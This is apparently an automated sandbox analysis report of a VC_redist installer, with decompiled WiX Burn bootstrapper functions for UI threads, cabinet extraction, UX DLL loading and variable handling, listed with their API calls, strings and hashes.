                                                                          								L27:
                                                                          								_pop(_t60);
                                                                          								L28:
                                                                          								E0002E7EB(_t64);
                                                                          								E000182A3(_t60, _t64, _t56);
                                                                          								_t75 =  *((intOrPtr*)(_t64 + 0x4b0)) - 0xffffffff;
                                                                          								if( *((intOrPtr*)(_t64 + 0x4b0)) != 0xffffffff) {
                                                                          									E000251E9(_t60, _t75, _t64 + 0x4a0,  *((intOrPtr*)(_t64 + 0xf8)), 0);
                                                                          								}
                                                                          								if(IsWindow( *(_t64 + 0x34)) != 0) {
                                                                          									PostMessageW( *(_t64 + 0x34), 0x10, 0, 0);
                                                                          								}
                                                                          								return _t72;
                                                                          							}
                                                                          						}
                                                                          						_push(0xe0000035);
                                                                          						_push(2);
                                                                          						E0001550F();
                                                                          						_t72 = 0;
                                                                          						goto L27;
                                                                          					}
                                                                          					_push("Failed to check global conditions");
                                                                          					goto L26;
                                                                          				}
                                                                          				_push("Failed to open log.");
                                                                          				goto L26;
                                                                          			}

                                                                          APIs
                                                                          • IsWindow.USER32(?), ref: 00014B5E
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00014B6F
                                                                          Strings
                                                                          • Failed to create the message window., xrefs: 00014A92
                                                                          • WixBundleLayoutDirectory, xrefs: 00014AEF
                                                                          • Failed to open log., xrefs: 00014A12
                                                                          • Failed to check global conditions, xrefs: 00014A43
                                                                          • Failed to set registration variables., xrefs: 00014AD8
                                                                          • Failed while running , xrefs: 00014B24
                                                                          • Failed to query registration., xrefs: 00014AA8
                                                                          • Failed to set layout directory variable to value provided from command-line., xrefs: 00014B00
                                                                          • Failed to set action variables., xrefs: 00014ABE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow
                                                                          • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                          • API String ID: 3618638489-3051724725
                                                                          • Opcode ID: 206bf13938e865ee60d317abebe87ff5f97dbcbf347f9807f4cb6724ba3ed5a1
                                                                          • Instruction ID: ce8a3bdd8d953a8afd7980f7f5fe46d92bfe0d0d3d5463c3ed2e1ae4dfb7dc89
                                                                          • Opcode Fuzzy Hash: 206bf13938e865ee60d317abebe87ff5f97dbcbf347f9807f4cb6724ba3ed5a1
                                                                          • Instruction Fuzzy Hash: 70410631A44A2ABBDB269A60CC85FFBBAACFF00751F010215F904A7561EB71FD9487D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E0002E82A(intOrPtr _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				void* _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				void _v24;
                                                                          				void* _t21;
                                                                          				void* _t24;
                                                                          				void* _t28;
                                                                          				intOrPtr _t43;
                                                                          				int _t45;
                                                                          
                                                                          				_v12 = 0;
                                                                          				asm("stosd");
                                                                          				_t45 = 0;
                                                                          				asm("stosd");
                                                                          				_v8 = 0;
                                                                          				asm("stosd");
                                                                          				_t21 = CreateEventW(0, 1, 0, 0);
                                                                          				_v12 = _t21;
                                                                          				if(_t21 != 0) {
                                                                          					_t43 = _a8;
                                                                          					_v24 = _t21;
                                                                          					_v20 = _a4;
                                                                          					_v16 = _t43;
                                                                          					_t24 = CreateThread(0, 0, E0002E563,  &_v24, 0, 0);
                                                                          					_v8 = _t24;
                                                                          					if(_t24 != 0) {
                                                                          						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
                                                                          						 *((intOrPtr*)(_t43 + 0x3e4)) = _v8;
                                                                          						_t28 = 0;
                                                                          						_v8 = 0;
                                                                          					} else {
                                                                          						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "uithread.cpp", 0x3c, _t45);
                                                                          						_push("Failed to create the UI thread.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "uithread.cpp", 0x33, _t45);
                                                                          					_push("Failed to create initialization event.");
                                                                          					L2:
                                                                          					_push(_t45);
                                                                          					E0005012F();
                                                                          					_t28 = _v8;
                                                                          				}
                                                                          				if(_t28 != 0) {
                                                                          					CloseHandle(_t28);
                                                                          					_v8 = 0;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					CloseHandle(_v12);
                                                                          				}
                                                                          				return _t45;
                                                                          			}

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00015386,?,?), ref: 0002E84A
                                                                          • GetLastError.KERNEL32(?,00015386,?,?), ref: 0002E857
                                                                          • CreateThread.KERNEL32 ref: 0002E8B0
                                                                          • GetLastError.KERNEL32(?,00015386,?,?), ref: 0002E8BD
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00015386,?,?), ref: 0002E8F8
                                                                          • CloseHandle.KERNEL32(00000000,?,00015386,?,?), ref: 0002E917
                                                                          • CloseHandle.KERNEL32(?,?,00015386,?,?), ref: 0002E924
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                          • String ID: @Met$Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                          • API String ID: 2351989216-3967303901
                                                                          • Opcode ID: 2a6c360c8f84a1b3936b61b1c9f551ab185ed4282aceb130dc1b4a2a94fd1ede
                                                                          • Instruction ID: b5b56d7acec5ac3f54ec343228da25e6a3df9ac5041814cdbf4cb93143c83bdf
                                                                          • Opcode Fuzzy Hash: 2a6c360c8f84a1b3936b61b1c9f551ab185ed4282aceb130dc1b4a2a94fd1ede
                                                                          • Instruction Fuzzy Hash: 92311475E40319BFEB509FA9DD85AAFB6ECEF08351F114126F905E7191D6309E008AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E0002E3F4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				long _v8;
                                                                          				int _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				intOrPtr _v28;
                                                                          				void _v32;
                                                                          				void* _t23;
                                                                          				void* _t29;
                                                                          				int _t31;
                                                                          				void* _t47;
                                                                          
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t23 = CreateEventW(0, 1, 0, 0);
                                                                          				_v16 = _t23;
                                                                          				if(_t23 != 0) {
                                                                          					_v32 = _t23;
                                                                          					_v28 = _a4;
                                                                          					_v24 = _a8;
                                                                          					_v20 = _a12;
                                                                          					_t29 = CreateThread(0, 0, E0002E177,  &_v32, 0,  &_v8);
                                                                          					_v12 = _t29;
                                                                          					if(_t29 != 0) {
                                                                          						_t31 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
                                                                          					} else {
                                                                          						_t46 =  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
                                                                          						_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "splashscreen.cpp", 0x42, _t47);
                                                                          						_push("Failed to create UI thread.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t50 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "splashscreen.cpp", 0x39, _t47);
                                                                          					_push("Failed to create modal event.");
                                                                          					L2:
                                                                          					_push(_t47);
                                                                          					_t31 = E0005012F();
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					_t31 = CloseHandle(_v12);
                                                                          					_v12 = 0;
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					return CloseHandle(_v16);
                                                                          				}
                                                                          				return _t31;
                                                                          			}















                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,00015386,?,?), ref: 0002E415
                                                                          • GetLastError.KERNEL32(?,?,00015386,?,?), ref: 0002E422
                                                                          • CreateThread.KERNEL32 ref: 0002E481
                                                                          • GetLastError.KERNEL32(?,?,00015386,?,?), ref: 0002E48E
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00015386,?,?), ref: 0002E4C9
                                                                          • CloseHandle.KERNEL32(?,?,?,00015386,?,?), ref: 0002E4DD
                                                                          • CloseHandle.KERNEL32(?,?,?,00015386,?,?), ref: 0002E4EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                          • String ID: @Met$Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                          • API String ID: 2351989216-2754267361
                                                                          • Opcode ID: f35092fface93e35c3bbe46cc9fe621a14e8164a6a97199cc7c60242abe85c29
                                                                          • Instruction ID: 6b07b3be2a60fe5275d62510ee9e71c094c876dba5f6a7e36982474861261156
                                                                          • Opcode Fuzzy Hash: f35092fface93e35c3bbe46cc9fe621a14e8164a6a97199cc7c60242abe85c29
                                                                          • Instruction Fuzzy Hash: A7318F75D40329BBEB21AFA9DC05AAFBBF8EF44711F10812AFD15E7190D7345A008AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E00031224(intOrPtr _a4) {
                                                                          				long _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				long _t20;
                                                                          				intOrPtr _t50;
                                                                          
                                                                          				_t50 = _a4;
                                                                          				_v16 =  *(_t50 + 0x28);
                                                                          				_v12 =  *(_t50 + 0x20);
                                                                          				_v8 = 0;
                                                                          				_t20 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
                                                                          				if(_t20 == 0) {
                                                                          					if(ResetEvent( *(_t50 + 0x28)) != 0) {
                                                                          						 *((intOrPtr*)(_t50 + 0x2c)) = 0;
                                                                          					} else {
                                                                          						_t37 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x13e, _t38);
                                                                          						_push("Failed to reset operation complete event.");
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					if(_t20 == 1) {
                                                                          						if(GetExitCodeThread( *(_t50 + 0x20),  &_v8) == 0) {
                                                                          							_t43 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							_t44 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "cabextract.cpp", 0x145, _t44);
                                                                          							_push("Failed to get extraction thread exit code.");
                                                                          							goto L7;
                                                                          						}
                                                                          					} else {
                                                                          						_t47 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x14b, _t48);
                                                                          						_push("Failed to wait for operation complete event.");
                                                                          						L7:
                                                                          						_push(_v8);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				return _v8;
                                                                          			}









                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,746AF5E0,?,?,000152FD,000152B5,00000000,0001533D), ref: 00031249
                                                                          • GetLastError.KERNEL32 ref: 0003125C
                                                                          • GetExitCodeThread.KERNEL32(0005B478,?), ref: 0003129E
                                                                          • GetLastError.KERNEL32 ref: 000312AC
                                                                          • ResetEvent.KERNEL32(0005B450), ref: 000312E7
                                                                          • GetLastError.KERNEL32 ref: 000312F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                          • String ID: @Met$Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                          • API String ID: 2979751695-2925335154
                                                                          • Opcode ID: 96e1dad35e4fff5a640c4c10a1aeeaefbc0de680c30eb96f5cf9240a048b12c1
                                                                          • Instruction ID: 0281abe507f24b18721e2a4d911457e0cd3d32bb58a0c35fb68f9b5de862babd
                                                                          • Opcode Fuzzy Hash: 96e1dad35e4fff5a640c4c10a1aeeaefbc0de680c30eb96f5cf9240a048b12c1
                                                                          • Instruction Fuzzy Hash: F721C175740304AFEB14AB798D06AFF76F8EF09711F10452EF946E61E0E734DA009A25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E00031341(void* __ebx, intOrPtr _a4) {
                                                                          				signed short _t30;
                                                                          				signed short _t34;
                                                                          				void* _t37;
                                                                          				void* _t42;
                                                                          				intOrPtr _t49;
                                                                          
                                                                          				_t37 = __ebx;
                                                                          				_t49 = _a4;
                                                                          				_t42 = 0;
                                                                          				if( *(_t49 + 0x20) != 0) {
                                                                          					_t3 = _t49 + 0x24; // 0x685479f6
                                                                          					 *((intOrPtr*)(_t49 + 0x2c)) = 5;
                                                                          					if(SetEvent( *_t3) != 0) {
                                                                          						_t5 = _t49 + 0x20; // 0x85f08bff
                                                                          						if(WaitForSingleObject( *_t5, 0xffffffff) != 0) {
                                                                          							_t30 = GetLastError();
                                                                          							_t45 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          							_t42 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "cabextract.cpp", 0x10b, _t42);
                                                                          							_push("Failed to wait for thread to terminate.");
                                                                          							goto L5;
                                                                          						}
                                                                          					} else {
                                                                          						_t34 = GetLastError();
                                                                          						_t48 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						_t42 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x105, _t42);
                                                                          						_push("Failed to set begin operation event.");
                                                                          						L5:
                                                                          						_push(_t42);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				_push(_t37);
                                                                          				if( *(_t49 + 0x20) != 0) {
                                                                          					_t7 = _t49 + 0x20; // 0x85f08bff
                                                                          					CloseHandle( *_t7);
                                                                          					 *(_t49 + 0x20) =  *(_t49 + 0x20) & 0x00000000;
                                                                          				}
                                                                          				if( *(_t49 + 0x24) != 0) {
                                                                          					_t11 = _t49 + 0x24; // 0x685479f6
                                                                          					CloseHandle( *_t11);
                                                                          					 *(_t49 + 0x24) =  *(_t49 + 0x24) & 0x00000000;
                                                                          				}
                                                                          				if( *(_t49 + 0x28) != 0) {
                                                                          					_t15 = _t49 + 0x28; // 0x5ba60
                                                                          					CloseHandle( *_t15);
                                                                          					 *(_t49 + 0x28) =  *(_t49 + 0x28) & 0x00000000;
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t49 + 0x4c)) != 0) {
                                                                          					_t19 = _t49 + 0x4c; // 0x682c79f6
                                                                          					E00013999( *_t19);
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t49 + 0x1c)) != 0) {
                                                                          					_t21 = _t49 + 0x1c; // 0xfff48be8
                                                                          					E000554EF( *_t21);
                                                                          				}
                                                                          				return _t42;
                                                                          			}









                                                                          APIs
                                                                          • SetEvent.KERNEL32(685479F6,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?), ref: 0003135E
                                                                          • GetLastError.KERNEL32(?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381), ref: 00031368
                                                                          • WaitForSingleObject.KERNEL32(85F08BFF,000000FF,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381), ref: 000313A2
                                                                          • GetLastError.KERNEL32(?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381), ref: 000313AC
                                                                          • CloseHandle.KERNEL32(85F08BFF,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 000313F7
                                                                          • CloseHandle.KERNEL32(685479F6,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 00031406
                                                                          • CloseHandle.KERNEL32(0005BA60,00015381,0001533D,00000000,?,0001C06D,0001533D,000152B5,00000000,?,0002763B,?,00015565,00015371,00015371,00000000), ref: 00031415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                          • String ID: @Met$Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                          • API String ID: 1206859064-254475197
                                                                          • Opcode ID: dcce1d7c49e4888c4e3ea2853ded4bc351791e18bfc34e4f6b8c54d788bdc60a
                                                                          • Instruction ID: dd3133e8c1b64a0757859499d016c2861bc1f44926d33d696df9ec81e8bbf66f
                                                                          • Opcode Fuzzy Hash: dcce1d7c49e4888c4e3ea2853ded4bc351791e18bfc34e4f6b8c54d788bdc60a
                                                                          • Instruction Fuzzy Hash: 6821C732200700DFE7326B26DC45BA776FAFF88712F01062DE54A919E0DB79E441DE25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 18%
                                                                          			E0001D5C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				struct HINSTANCE__* _t9;
                                                                          				signed short _t15;
                                                                          				signed short _t18;
                                                                          				intOrPtr* _t21;
                                                                          				intOrPtr _t24;
                                                                          				void* _t25;
                                                                          
                                                                          				_t24 = _a4;
                                                                          				_t2 = _t24 + 4; // 0x69006e
                                                                          				_t9 = LoadLibraryW( *( *_t2 + 0x50));
                                                                          				 *(_t24 + 0xc) = _t9;
                                                                          				if(_t9 != 0) {
                                                                          					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
                                                                          					if(_t21 != 0) {
                                                                          						_t5 = _t24 + 0x10; // 0x5b4a0
                                                                          						_t25 =  *_t21(_a8, _a12, _t5);
                                                                          						if(_t25 < 0) {
                                                                          							_push("Failed to create UX.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_t15 = GetLastError();
                                                                          						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "userexperience.cpp", 0x5d, _t25);
                                                                          						_push("Failed to get BootstrapperApplicationCreate entry-point");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					_t18 = GetLastError();
                                                                          					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "userexperience.cpp", 0x59, _t25);
                                                                          					_push("Failed to load UX DLL.");
                                                                          					L6:
                                                                          					_push(_t25);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t25;
                                                                          			}










                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(?,00000000,?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D5CD
                                                                          • GetLastError.KERNEL32(?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D5DA
                                                                          • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0001D612
                                                                          • GetLastError.KERNEL32(?,000146F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00015386,?,?), ref: 0001D61E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                          • String ID: @Met$BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
                                                                          • API String ID: 1866314245-3673390192
                                                                          • Opcode ID: ddc07bab9240b03ba2f221fd501932b6581cd6bb70443fdf56bdbe4c3c04a58f
                                                                          • Instruction ID: 3f77daa50eb16e12360e6b04ed3d23604385354c1dfcdc507e4131e985c68076
                                                                          • Opcode Fuzzy Hash: ddc07bab9240b03ba2f221fd501932b6581cd6bb70443fdf56bdbe4c3c04a58f
                                                                          • Instruction Fuzzy Hash: 6311E932A40732ABEB215A699C05FBB36D4DF04752F01413AFE09E75D0EB29DC408BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E00016E5A(void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
                                                                          				int _v8;
                                                                          				char _v12;
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				char _v24;
                                                                          				intOrPtr _v28;
                                                                          				char _v32;
                                                                          				void* _v40;
                                                                          				void _v56;
                                                                          				char* _t67;
                                                                          				signed int _t75;
                                                                          				int _t81;
                                                                          				int _t91;
                                                                          				char* _t96;
                                                                          				int _t97;
                                                                          				char* _t108;
                                                                          				signed int _t110;
                                                                          				void* _t112;
                                                                          				int _t115;
                                                                          				int _t116;
                                                                          				int _t121;
                                                                          				void* _t124;
                                                                          
                                                                          				_t124 = __eflags;
                                                                          				_t110 = 6;
                                                                          				_v16 = 0;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v12 = 0;
                                                                          				memset( &_v56, 0, _t110 << 2);
                                                                          				_v20 = 0;
                                                                          				_v24 = 0;
                                                                          				_v8 = 0;
                                                                          				asm("movlpd [ebp-0x1c], xmm0");
                                                                          				EnterCriticalSection(_a4);
                                                                          				_t120 = _a20;
                                                                          				_t109 = _a16;
                                                                          				_t121 = E0004F534(0, _t124, _a12, _a16, _a20,  &_v16);
                                                                          				if(_t121 >= 0) {
                                                                          					_a20 = _a20 & 0x00000000;
                                                                          					__eflags = _v16;
                                                                          					if(__eflags <= 0) {
                                                                          						L39:
                                                                          						LeaveCriticalSection(_a4);
                                                                          						if(_v12 != 0) {
                                                                          							E000554EF(_v12);
                                                                          						}
                                                                          						E00030499( &_v56);
                                                                          						_t67 =  &_v32;
                                                                          						_t112 = 8;
                                                                          						do {
                                                                          							 *_t67 = 0;
                                                                          							_t67 = _t67 + 1;
                                                                          							_t112 = _t112 - 1;
                                                                          						} while (_t112 != 0);
                                                                          						E00012793(_v8);
                                                                          						return _t121;
                                                                          					} else {
                                                                          						goto L3;
                                                                          					}
                                                                          					while(1) {
                                                                          						L3:
                                                                          						_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v20);
                                                                          						__eflags = _t121;
                                                                          						if(_t121 < 0) {
                                                                          							break;
                                                                          						}
                                                                          						__eflags = _v20;
                                                                          						if(__eflags == 0) {
                                                                          							L27:
                                                                          							_t75 = _a20 + 1;
                                                                          							_a20 = _t75;
                                                                          							__eflags = _t75 - _v16;
                                                                          							if(__eflags < 0) {
                                                                          								continue;
                                                                          							}
                                                                          							goto L39;
                                                                          						}
                                                                          						_t121 = E0004F58F(0, __eflags, _a12, _t109, _t120,  &_v12);
                                                                          						__eflags = _t121;
                                                                          						if(__eflags < 0) {
                                                                          							_push("Failed to read variable name.");
                                                                          							L38:
                                                                          							_push(_t121);
                                                                          							E0005012F();
                                                                          							goto L39;
                                                                          						}
                                                                          						_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v40);
                                                                          						__eflags = _t121;
                                                                          						if(_t121 < 0) {
                                                                          							_push("Failed to read variable value type.");
                                                                          							goto L38;
                                                                          						}
                                                                          						_t81 = _v40;
                                                                          						__eflags = _t81;
                                                                          						if(__eflags == 0) {
                                                                          							L24:
                                                                          							_t121 = E0004F534(0, __eflags, _a12, _t109, _t120,  &_v24);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								_push("Failed to read variable literal flag.");
                                                                          								goto L38;
                                                                          							}
                                                                          							asm("sbb eax, eax");
                                                                          							_t121 = E00016C5D(0, _a4, _v12,  &_v56, _v24,  ~_a8 + 3, 0);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								_push("Failed to set variable.");
                                                                          								goto L38;
                                                                          							}
